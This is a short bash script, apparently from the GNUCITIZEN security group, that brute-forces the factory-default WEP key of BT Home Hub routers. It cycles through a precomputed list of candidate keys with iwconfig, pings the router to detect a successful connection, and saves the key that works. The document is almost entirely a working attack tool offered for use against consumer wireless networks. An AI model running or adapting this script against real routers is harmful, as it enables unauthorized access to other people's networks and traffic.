#!/bin/bash

# BTHHkeybf.sh by Adrian 'pagvac' Pastor | GNUCITIZEN | www.gnucitizen.org
#
# Credits to Kevin Devine <wyse101 at gmail.com> for his awesome reverse-engineerng work
# that allows us to narrow down the default encrytion key of the BT Home Hub to
# approximately 80 different values by simply knowing the default SSID 


# NOTES:
# - this tool was tested on BackTrack v.2.0 Final against several BT Home Hub routers
#   using the factory-default WEP key
#
# - takes about 7 mins on *average* to crack the key
#
# - the target BT Home Hub must be reliably reachable (good signal strength) throughout
#   the bruteforce process. Otherwise, the valid key might not be picked up
#
# - use 'iwconfig' to find out what's your wireless interface
#
# - use the BTHHkeygen tool hosted at www.gnucitizen.org 
#   to generate the file containing the possible keys

if [[ $# -ne 3 ]]
then
	echo "syntax: $0 <wireless-interface> <essid> <keys-file>"
	echo "i.e.: $0 eth1 BTHomeHub-60B4 keys.txt"
	exit 0
fi

# we use static address rather than DHCP in order to save time during brute-force
echo "adding static IP address configuration ..."
ifconfig $1 192.168.1.137 netmask 255.255.255.0 2>/dev/null
route del default gw 192.168.1.254 2>/dev/null

echo "adding default gateway ..."
route add default gw 192.168.1.254 2>/dev/null

echo -en "trying key: ";

for key in `cat $3`
do
	echo -en "$key "
	iwconfig $1 key $key 

	# if home hub is pingable then we're in!	
	if ping -c 4 192.168.1.254 | grep "64 bytes from" > /dev/null
	then
		echo -en "\nvalid key found!: $key\n"
		echo $key > $2.found.txt
		echo "found key was saved on $2.found.txt"
		route del default gw 192.168.1.254 2>/dev/null
		break
	fi
done

route del default gw 192.168.1.254 2>/dev/null
